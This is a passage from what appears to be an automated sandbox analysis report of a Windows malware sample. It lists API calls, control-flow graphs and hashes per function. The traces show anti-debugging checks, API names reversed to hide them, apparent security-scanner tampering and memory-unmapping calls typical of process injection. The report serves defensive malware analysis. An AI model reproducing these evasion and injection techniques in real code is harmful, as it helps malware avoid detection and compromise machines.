                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                • API String ID: 1759228003-2375825460
                                                                                                                • Opcode ID: 7798c7825a9e5bb3a98639b66603cdd54f05e43244ff6f9fae95cc2c236302ee
                                                                                                                • Instruction ID: afa187e1a2a35b2c1a5653b1cda3ac8cd8793e92152ad4e702fa37ef37d7c6e2
                                                                                                                • Opcode Fuzzy Hash: 7798c7825a9e5bb3a98639b66603cdd54f05e43244ff6f9fae95cc2c236302ee
                                                                                                                • Instruction Fuzzy Hash: 14511D71A8024C7EFB25D6E4CD45FEF77AC9B04344FA091A9BA08F6181D774EA468F60
                                                                                                                Function 02ED894C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 13205 2ed894c-2ed8971 LoadLibraryW 13206 2ed89bb-2ed89c1 13205->13206 13207 2ed8973-2ed898b GetProcAddress 13205->13207 13208 2ed898d-2ed89ac call 2ed7d78 13207->13208 13209 2ed89b0-2ed89b6 FreeLibrary 13207->13209 13208->13209 13212 2ed89ae 13208->13212 13209->13206 13212->13209
                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(bcrypt,?,00000888,00000000,02F473A8,02EDA587,ScanString,02F473A8,02EDA93C,ScanBuffer,02F473A8,02EDA93C,Initialize,02F473A8,02EDA93C,UacScan), ref: 02ED8960
                                                                                                                • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02ED897A
                                                                                                                • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000888,00000000,02F473A8,02EDA587,ScanString,02F473A8,02EDA93C,ScanBuffer,02F473A8,02EDA93C,Initialize), ref: 02ED89B6
                                                                                                                  • Part of subcall function 02ED7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02ED7DEC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                • String ID: BCryptVerifySignature$bcrypt
                                                                                                                • API String ID: 1002360270-4067648912
                                                                                                                • Opcode ID: 208eeaa5834835de414608ccac7a1d48fe6610e32474860d503147cf71e65127
                                                                                                                • Instruction ID: 8bc808925e4681d8657e180f56d80e51c55b7a5ea07325c01e8495c4a23f5f1f
                                                                                                                • Opcode Fuzzy Hash: 208eeaa5834835de414608ccac7a1d48fe6610e32474860d503147cf71e65127
                                                                                                                • Instruction Fuzzy Hash: BCF0AFF5AC03185EE310B7A8A889F77F7DC97A179CF005969B90C87140C7F068528B90
                                                                                                                Function 02EDF744 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 13222 2edf744-2edf75e GetModuleHandleW 13223 2edf78a-2edf792 13222->13223 13224 2edf760-2edf772 GetProcAddress 13222->13224 13224->13223 13225 2edf774-2edf784 CheckRemoteDebuggerPresent 13224->13225 13225->13223 13226 2edf786 13225->13226 13226->13223
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(KernelBase), ref: 02EDF754
                                                                                                                • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02EDF766
                                                                                                                • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02EDF77D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                                                                • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                                                • API String ID: 35162468-539270669
                                                                                                                • Opcode ID: b771b83de3e3d8766eced4b4e86ae9bbdddf95abcd80c3265e32124976f44e05
                                                                                                                • Instruction ID: 1484ce592f13ebdd5deff76ec26af92d93df3240d35557d4041e9df55733ee4e
                                                                                                                • Opcode Fuzzy Hash: b771b83de3e3d8766eced4b4e86ae9bbdddf95abcd80c3265e32124976f44e05
                                                                                                                • Instruction Fuzzy Hash: 95F0A770944248BAEB10E7F888887DDFBA95B0932CF249394E436665C1E7710641CA61
                                                                                                                Function 02EDDD70 Relevance: 7.6, APIs: 5, Instructions: 80nativefileCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                  • Part of subcall function 02EC4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02EC4F2E
                                                                                                                • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02EDDE40), ref: 02EDDDAB
                                                                                                                • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02EDDE40), ref: 02EDDDDB
                                                                                                                • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02EDDDF0
                                                                                                                • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02EDDE1C
                                                                                                                • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02EDDE25
                                                                                                                  • Part of subcall function 02EC4C60: SysFreeString.OLEAUT32(02EDF4A4), ref: 02EC4C6E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 1897104825-0
                                                                                                                • Opcode ID: a4c16caef25de9f12cf7b9a0a67d52a0db71d15ba5c74ed782bbf0d87ee8f05d
                                                                                                                • Instruction ID: 2f23e145a5c1304a64d44b7727e161631db1c16225beceab7e427cd4582d83c8
                                                                                                                • Opcode Fuzzy Hash: a4c16caef25de9f12cf7b9a0a67d52a0db71d15ba5c74ed782bbf0d87ee8f05d
                                                                                                                • Instruction Fuzzy Hash: E9210376A80308BEEB11EAE4CD52FDE77BDEB48700F505465B600F71C0DA74AA068B54
                                                                                                                Function 02EDE4B8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111networkCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02EDE5F6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CheckConnectionInternet
                                                                                                                • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                • API String ID: 3847983778-3852638603
                                                                                                                • Opcode ID: 83e29477fd1996d1fa75e44f52ed3bb209fe27ff7675721726e4c892ada6406f
                                                                                                                • Instruction ID: eb9c4411a516ce80870fb177f4802288209a2db85141605308c786ec47c7e738
                                                                                                                • Opcode Fuzzy Hash: 83e29477fd1996d1fa75e44f52ed3bb209fe27ff7675721726e4c892ada6406f
                                                                                                                • Instruction Fuzzy Hash: 1F411235B801099BEB01FBE4D951ADE73FAEF88700F64E429F051AB285DA70AD138F55
                                                                                                                Function 02EDDC8C Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                  • Part of subcall function 02EC4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02EC4F2E
                                                                                                                • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02EDDD5E), ref: 02EDDCCB
                                                                                                                • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02EDDD05
                                                                                                                • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02EDDD32
                                                                                                                • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02EDDD3B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 3764614163-0
                                                                                                                • Opcode ID: cfd591a89e1881cbec272aca3c3f7663f22fe70d58ce4e8a26c707cc58f7ef7a
                                                                                                                • Instruction ID: 3008783913ab1f82236957e4fbee9d6e5b69ced84dd7184d4dfcf6c6b1ec9d86
                                                                                                                • Opcode Fuzzy Hash: cfd591a89e1881cbec272aca3c3f7663f22fe70d58ce4e8a26c707cc58f7ef7a
                                                                                                                • Instruction Fuzzy Hash: 0121F172A80209BEEB10EAD4CD52FDEB7BDEB05B00F619565B600F71C0D7B06A068B64
                                                                                                                Function 02ED7A2A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 02ED81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02ED823C,?,?,00000000,?,02ED7A7E,ntdll,00000000,00000000,02ED7AC3,?,?,00000000), ref: 02ED820A
                                                                                                                  • Part of subcall function 02ED81CC: GetModuleHandleA.KERNELBASE(?), ref: 02ED821E
                                                                                                                  • Part of subcall function 02ED8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02ED82FC,?,?,00000000,00000000,?,02ED8215,00000000,KernelBASE,00000000,00000000,02ED823C), ref: 02ED82C1
                                                                                                                  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02ED82C7
                                                                                                                  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(?,?), ref: 02ED82D9
                                                                                                                • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02ED7A9F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                • API String ID: 4072585319-445027087
                                                                                                                • Opcode ID: 2c757b7cad364cb7abc810f798a565a4bd6299978c51befea0706c6933867833
                                                                                                                • Instruction ID: 3bdbfd59c2157de698c801dc72e6641c2dc1f91e7f1930711514e184008a9e02
                                                                                                                • Opcode Fuzzy Hash: 2c757b7cad364cb7abc810f798a565a4bd6299978c51befea0706c6933867833
                                                                                                                • Instruction Fuzzy Hash: DF116D79680208BFEB04EFA4DC51EAEF7FDEB48700F519465B900D7240D670AA12CB60
                                                                                                                Function 02ED7A2C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 02ED81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02ED823C,?,?,00000000,?,02ED7A7E,ntdll,00000000,00000000,02ED7AC3,?,?,00000000), ref: 02ED820A
                                                                                                                  • Part of subcall function 02ED81CC: GetModuleHandleA.KERNELBASE(?), ref: 02ED821E
                                                                                                                  • Part of subcall function 02ED8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02ED82FC,?,?,00000000,00000000,?,02ED8215,00000000,KernelBASE,00000000,00000000,02ED823C), ref: 02ED82C1
                                                                                                                  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02ED82C7
                                                                                                                  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(?,?), ref: 02ED82D9
                                                                                                                • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02ED7A9F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                • API String ID: 4072585319-445027087
                                                                                                                • Opcode ID: f5feaa7c295e00830aada1cd503e03533b535776eae3ca36949a3dfa914e1b94
                                                                                                                • Instruction ID: 33d34f7a36f1e252ba801e7cbab221552f71e08e3b4a25cb0058c54fb8f9ec4d
                                                                                                                • Opcode Fuzzy Hash: f5feaa7c295e00830aada1cd503e03533b535776eae3ca36949a3dfa914e1b94
                                                                                                                • Instruction Fuzzy Hash: 79118079680208BFEB04EFA4DC51FAEF7FDEB48700F519465B900D7240D670AA12CB60
                                                                                                                Function 02ED8400 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50nativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 02ED81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02ED823C,?,?,00000000,?,02ED7A7E,ntdll,00000000,00000000,02ED7AC3,?,?,00000000), ref: 02ED820A
                                                                                                                  • Part of subcall function 02ED81CC: GetModuleHandleA.KERNELBASE(?), ref: 02ED821E
                                                                                                                  • Part of subcall function 02ED8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02ED82FC,?,?,00000000,00000000,?,02ED8215,00000000,KernelBASE,00000000,00000000,02ED823C), ref: 02ED82C1
                                                                                                                  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02ED82C7
                                                                                                                  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(?,?), ref: 02ED82D9
                                                                                                                • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02ED8471
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule$AddressProc$MemoryReadVirtual
                                                                                                                • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                                                • API String ID: 2521977463-737317276
                                                                                                                • Opcode ID: 9c2e09782513d1ec45e1810abb5bcc8bf3f804cade6bb0905425882f30b8cf7d
                                                                                                                • Instruction ID: 985a66186b75bfa6b61769692d74d93bedc868ac0fb34ce3f094470fba4730f1
                                                                                                                • Opcode Fuzzy Hash: 9c2e09782513d1ec45e1810abb5bcc8bf3f804cade6bb0905425882f30b8cf7d
                                                                                                                • Instruction Fuzzy Hash: C2014C79680208BFEB10EFA8DC51EAAB7FEEB49704F519464F904D7640D674A912CB24
                                                                                                                Function 02ED7D78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 02ED81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02ED823C,?,?,00000000,?,02ED7A7E,ntdll,00000000,00000000,02ED7AC3,?,?,00000000), ref: 02ED820A
                                                                                                                  • Part of subcall function 02ED81CC: GetModuleHandleA.KERNELBASE(?), ref: 02ED821E
                                                                                                                  • Part of subcall function 02ED8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02ED82FC,?,?,00000000,00000000,?,02ED8215,00000000,KernelBASE,00000000,00000000,02ED823C), ref: 02ED82C1
                                                                                                                  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02ED82C7
                                                                                                                  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(?,?), ref: 02ED82D9
                                                                                                                • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02ED7DEC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                                                                • String ID: Ntdll$yromeMlautriVetirW
                                                                                                                • API String ID: 2719805696-3542721025
                                                                                                                • Opcode ID: c82b454ac9138dfa09d0c9341138783f65305d55edb74ca1a4ca48122146924c
                                                                                                                • Instruction ID: fa131d9837de4061a2040a2b11a9d0b2ec50ecc4df9f93079f0eeed61712c1f7
                                                                                                                • Opcode Fuzzy Hash: c82b454ac9138dfa09d0c9341138783f65305d55edb74ca1a4ca48122146924c
                                                                                                                • Instruction Fuzzy Hash: 8C014C75680208AFDB00EFA8DC52E9EF7FDEB49B04F50A854B904DB640D770AD168B64
                                                                                                                Function 02ED8670 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43nativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 02ED81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02ED823C,?,?,00000000,?,02ED7A7E,ntdll,00000000,00000000,02ED7AC3,?,?,00000000), ref: 02ED820A
                                                                                                                  • Part of subcall function 02ED81CC: GetModuleHandleA.KERNELBASE(?), ref: 02ED821E
                                                                                                                  • Part of subcall function 02ED8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02ED82FC,?,?,00000000,00000000,?,02ED8215,00000000,KernelBASE,00000000,00000000,02ED823C), ref: 02ED82C1
                                                                                                                  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02ED82C7
                                                                                                                  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(?,?), ref: 02ED82D9
                                                                                                                • NtUnmapViewOfSection.NTDLL(?,?), ref: 02ED86D5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule$AddressProc$SectionUnmapView
                                                                                                                • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                                • API String ID: 3503870465-2520021413
                                                                                                                • Opcode ID: 78a5dbdd03b7be6d93f72084edc63028b69bc2e325ffe0f967169516fe5c0ae3
                                                                                                                • Instruction ID: 98b81b4b92334b9c914d10438d84f4c66b1efe36b961715e98f3caa56051feec
                                                                                                                • Opcode Fuzzy Hash: 78a5dbdd03b7be6d93f72084edc63028b69bc2e325ffe0f967169516fe5c0ae3
                                                                                                                • Instruction Fuzzy Hash: 8D018F386C0208AFEB04EBA4DD51E6EF7FEEB48B40F51D464B400D7640DA70A9038A24
                                                                                                                Function 02EDDBB0 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RtlI.N(?,?,00000000,02EDDC7E), ref: 02EDDC2C
                                                                                                                • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02EDDC7E), ref: 02EDDC42
                                                                                                                • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02EDDC7E), ref: 02EDDC61
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Path$DeleteFileNameName_
                                                                                                                • String ID:
                                                                                                                • API String ID: 4284456518-0
                                                                                                                • Opcode ID: 203608313df74bd5a678d6fe0fb5ac73cc4053035dbbf230a655de403dc8d63f
                                                                                                                • Instruction ID: 9d15db64e329bc14460cfaa0ada203500cb70350cdc260a6f84d92f54ad07d29
                                                                                                                • Opcode Fuzzy Hash: 203608313df74bd5a678d6fe0fb5ac73cc4053035dbbf230a655de403dc8d63f
                                                                                                                • Instruction Fuzzy Hash: 26018B765C420C6EEB05EBA0CD51FCD77BDAB45708F519492E201F7081DAB56B068B24
                                                                                                                Function 02EDDC04 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 02EC4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02EC4F2E
                                                                                                                • RtlI.N(?,?,00000000,02EDDC7E), ref: 02EDDC2C
